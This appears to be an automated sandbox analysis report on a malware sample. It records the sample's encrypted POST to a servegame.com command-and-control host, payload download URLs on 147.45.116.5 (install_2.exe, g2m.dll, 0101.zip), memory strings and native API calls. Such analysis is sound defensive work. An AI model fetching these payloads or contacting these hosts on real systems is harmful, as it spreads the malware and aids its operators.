Source: global traffic HTTP traffic detected: GET /api/timezone/America/Sao_Paulo HTTP/1.1Connection: closeHost: worldtimeapi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic DNS traffic detected: DNS query: time.nist.gov
Source: global traffic DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic DNS traffic detected: DNS query: tgb5f522c40.servegame.com
Source: unknown HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5F522C40.SERVEGAME.COMCONTENT-LENGTH: 7246Data Raw: 76 c9 dc 1b df 8a 58 32 87 83 fa 8d 9d 8c 18 80 4a cb 4b 17 6b 80 8e 0c 25 a6 a1 39 d3 62 77 20 a0 16 78 d7 50 d7 b2 ca c0 ed 1d 47 88 9f b0 80 81 f8 9d 2e 71 01 1f 7e 3f 36 c7 50 99 84 8a 76 61 8e d5 b6 c3 a9 c6 fd f5 69 e8 53 49 7d 85 44 1a 80 3c f6 06 39 9e 13 f1 c7 df 0e 2d 85 86 bf ef 9f 14 f6 32 f8 52 57 3c 61 62 0a a0 bd 7e f7 5c 4f 99 fe 08 61 1c 98 22 12 0c 81 e3 54 86 d6 e3 c2 db 00 f0 1f 2a 40 a7 04 fb ba b8 21 53 a1 a3 d8 cf 3b ad b6 6a 43 1c 3a 41 ec 95 1d cf 1c 87 d4 36 44 ed a6 11 90 91 ad 3b c6 82 21 37 2d 29 e5 6d 1e e7 8d 99 b1 83 fb 00 06 b8 e1 77 6a 1a bd 18 82 07 59 6b d7 97 11 4b 71 a1 45 99 33 ac 90 c4 77 87 78 dd 3b c2 d6 2f 3a d9 68 0f 24 02 68 38 18 02 13 cf 29 2f 2c fe 8c 39 c8 6d a4 98 cf fb f0 d8 92 21 aa f2 8b f2 cf 2e c4 61 cf 10 7c 91 4d 32 cc 6a 20 df 55 d5 0b 56 47 de dc 08 03 fc b4 8e af 1e a5 34 f3 f5 95 78 65 dd 41 ec 17 0b 02 e0 8a 77 e5 0f f4 96 dd bb 72 0c c3 e9 d6 37 a1 d7 8d 9d 28 97 e8 c7 24 17 30 04 39 f4 2a ac 08 94 43 90 40 55 d5 8d 90 06 35 25 60 9a 29 03 82 04 e3 be 31 17 21 1d d1 a0 41 f4 fb 88 78 49 0c 0d 16 c6 f2 2d f7 42 12 79 5a 85 11 e2 78 39 38 9c 77 6a 03 d1 22 ea fd bf c8 ae dc b7 2a 1c bb e9 c0 a2 16 c0 c2 11 38 68 df 2c 83 82 5f 62 76 d1 9c 8d 81 0e fb bb b6 1c b4 fe 87 75 44 6c a3 24 5f 6a 82 39 fc 9c 1d 53 db d0 5f 91 34 8f 0d 50 e0 3c 38 56 f1 33 48 99 24 62 1b d2 06 86 57 86 71 62 af b3 a8 a9 75 fc 2b 83 85 03 ab 33 fc 05 d5 d1 8e 2e b5 50 32 25 92 02 8c e9 0e c1 15 ac b1 24 94 07 79 76 03 96 a8 ad 7f 1b 3d 9a e7 33 9f 74 5f 88 5e 81 7b a7 6c 39 dd ee f2 a0 26 60 fd 17 cc 32 52 5d 70 e5 eb 42 95 88 66 85 38 bc 77 57 98 19 b9 08 39 8e 15 b6 4c 4f 8c 3a 65 33 99 76 41 e4 76 d8 4d f0 48 84 d9 e4 60 c7 51 2f ff c9 70 46 12 3a a9 94 61 84 12 40 6d 6b 09 b6 d0 f3 c8 22 68 32 bc 3c 67 96 ef c1 ef ed 5b 78 f7 1b e1 3f f5 42 0a a3 c5 4d 00 d0 28 fa 97 9b 12 5c 43 ab 0b 9c 51 04 6b aa 1b e5 63 b8 32 a1 52 1b 24 7e 70 81 10 76 96 f2 f6 14 7b 7f eb 68 53 40 95 2a cf fa c1 ed 64 6c 1a 03 05 a6 d2 8a e4 bd 3f 74 09 43 bb ed cb e5 ef 89 dd 4c 95 25 94 92 bc 1a 58 7e cb 76 b9 c7 a4 eb bb 12 e9 f7 d1 ef 08 aa 98 9e 84 15 1a d7 96 95 ed 5a 4f 9b eb 94 c6 92 16 74 03 21 2b 0a b6 9e 8a 6d 6e 5c ab 73 88 d8 ae c1 af e0 0f 98 7a 1e c5 59 79 0b 67 ce 64 80 35 0e e5 cb b2 06 2b a2 ee e3 dd f1 f2 6d d3 c3 24 b6 85 29 44 16 26 08 86 2b 01 55 56 42 86 d4 b1 9c 34 4d c7 8c 1a 12 05 90 7c a0 81 61 8e 8f 08 a6 71 b7 6f c7 32 b1 2d 90 4a d0 c3 e3 4b f1 4a 55 1b ad 9b 94 47 03 9c ae 36 ba 6d a5 9c 4c 34 cd d4 2d 1e 4c 9a cb 56 e5 ff 80 b7 b7 b6 90 52 92 77 bf 8e 68 3c 51 2a c7 01 d8 f3 f0 c8 2c d0 ed df 33 04 22 7a 71 ac 92 9f 49 bd 06 31 e9 73 22 ef 74 ad 32 6d 6d 8f 9c 90 f1 ea ed c3 53 23 c7 f5 bb 28 42 0a 17 2f 09 84 ec 2b 9c b1 91 f9 3f ed ce 96 87 5b 27 46 31 0c 0d ed 61 e2 f1 ff b0 a3 4e 68 7a 8b 47 71 cd 9d 7a 6e ca 59 97 43 f8 cb 5e 83 06 7d 70 0d 88 49 5b bb a9 1d 25 df 33 82 ec b1 36 3f ea ef 07 26 28 f4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 20:42:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3340593841.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724575479.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/1qd
Source: install_2.dll, 00000002.00000002.3340085430.0000000000477000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipoE
Source: Q0cWJo6Jvh.exe, Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120575106.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dll
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dll3:G
Source: Q0cWJo6Jvh.exe String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dllDownloadBinary/1.0147.45.116.5FANTASMA/g2m.dllhttp://147.45.116.
Source: Q0cWJo6Jvh.exe, Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3338900809.000000FD9BDF3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe9
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exeUq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/X
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php_j
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/iq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/mq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/g2m.dll
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340799261.00000279C7373000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724376083.00000279C7372000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/install_2.exepZ
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://code.google.com/p/swfobject/
Source: install_2.dll, 00000002.00000002.3340776852.000000000254C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://dev.w3.org/html5/websockets/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io/license/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://gimite.net/en/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://javascript.crockford.com/jsmin.html
Source: install_2.dll, 00000002.00000002.3340776852.000000000254C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0&
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6455
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.esegece.com
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002AEE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000000E.00000003.2593369032.0000000002A6E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.foolabs.com/xpdf
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: ybtrrus.exe, 00000005.00000002.3343611670.00000000064CF000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000005.00000002.3372050029.000000000764C000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000000E.00000003.2591884945.000000000764C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.indyproject.org/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: install_2.dll, 00000002.00000003.2492972939.000000000254D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com.&nbsp;
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.000000000102D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.phpZ
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/support.php
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeF
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeeow.
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeh
Source: ybtrrus.exe, 00000005.00000002.3340950977.000000000100E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3376425505.0000000009AC6000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000000E.00000003.2593369032.0000000002B70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.secureblackbox.com
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: install_2.dll, 00000002.00000002.3341287236.000000006D39D000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com/license/free
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/Yaffle/EventSource/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection/issues/778#issuecomment-524853468
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RecordRTC
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\temp333\install_2.dll Memory allocated: 76AB0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\temp333\install_2.dll Code function: 2_2_6D372910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D372910
Source: C:\temp333\install_2.dll Code function: 2_2_6D334430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 2_2_6D334430
Source: C:\temp333\install_2.dll Code function: 2_2_6D368701 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D368701
Source: C:\temp333\install_2.dll Code function: 2_2_6D3727F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D3727F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D335E50 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D335E50
Source: C:\temp333\install_2.dll Code function: 2_2_6D337920 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D337920
Source: C:\temp333\install_2.dll Code function: 2_2_6D333B50 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D333B50
Source: C:\temp333\install_2.dll Code function: 2_2_6D3372C0 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D3372C0
Contains functionality to communicate with device drivers
Source: C:\temp333\install_2.dll Code function: 2_2_6D334430: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 2_2_6D334430
Detected potential crypto function
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779869A70 0_2_00007FF779869A70
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986F9B0 0_2_00007FF77986F9B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77984F9C0 0_2_00007FF77984F9C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987597D 0_2_00007FF77987597D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779831CC0 0_2_00007FF779831CC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779843DE0 0_2_00007FF779843DE0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987E0A0 0_2_00007FF77987E0A0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983A080 0_2_00007FF77983A080
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779861F2E 0_2_00007FF779861F2E
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77984FF50 0_2_00007FF77984FF50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779861F78 0_2_00007FF779861F78
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985D280 0_2_00007FF77985D280
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985B1F0 0_2_00007FF77985B1F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798793F6 0_2_00007FF7798793F6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988F410 0_2_00007FF77988F410
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986D356 0_2_00007FF77986D356
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779837360 0_2_00007FF779837360
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986B6D4 0_2_00007FF77986B6D4
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798716E0 0_2_00007FF7798716E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779857700 0_2_00007FF779857700
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987B700 0_2_00007FF77987B700
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987D660 0_2_00007FF77987D660
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779859850 0_2_00007FF779859850
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798317C0 0_2_00007FF7798317C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779887760 0_2_00007FF779887760
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779872A70 0_2_00007FF779872A70
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987ACC0 0_2_00007FF77987ACC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779860D0E 0_2_00007FF779860D0E
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779870D00 0_2_00007FF779870D00
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779828C80 0_2_00007FF779828C80
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987CBC0 0_2_00007FF77987CBC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983AB50 0_2_00007FF77983AB50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779874B50 0_2_00007FF779874B50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779860D58 0_2_00007FF779860D58
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986F020 0_2_00007FF77986F020
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779835070 0_2_00007FF779835070
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798C4F30 0_2_00007FF7798C4F30
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987A2A0 0_2_00007FF77987A2A0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779840250 0_2_00007FF779840250
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779872272 0_2_00007FF779872272
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985C260 0_2_00007FF77985C260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986E1D3 0_2_00007FF77986E1D3
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798281F0 0_2_00007FF7798281F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987C120 0_2_00007FF77987C120
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779878515 0_2_00007FF779878515
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986C504 0_2_00007FF77986C504
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779842490 0_2_00007FF779842490
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779870370 0_2_00007FF779870370
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798566E0 0_2_00007FF7798566E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988C5B0 0_2_00007FF77988C5B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988A5D0 0_2_00007FF77988A5D0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798508B0 0_2_00007FF7798508B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77982E8F0 0_2_00007FF77982E8F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779838910 0_2_00007FF779838910
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986A884 0_2_00007FF77986A884
Source: C:\temp333\install_2.dll Code function: 2_2_6D204570 2_2_6D204570
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D27E0 2_2_6D1D27E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D373DBB 2_2_6D373DBB
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D79E0 2_2_6D1D79E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E3B80 2_2_6D1E3B80
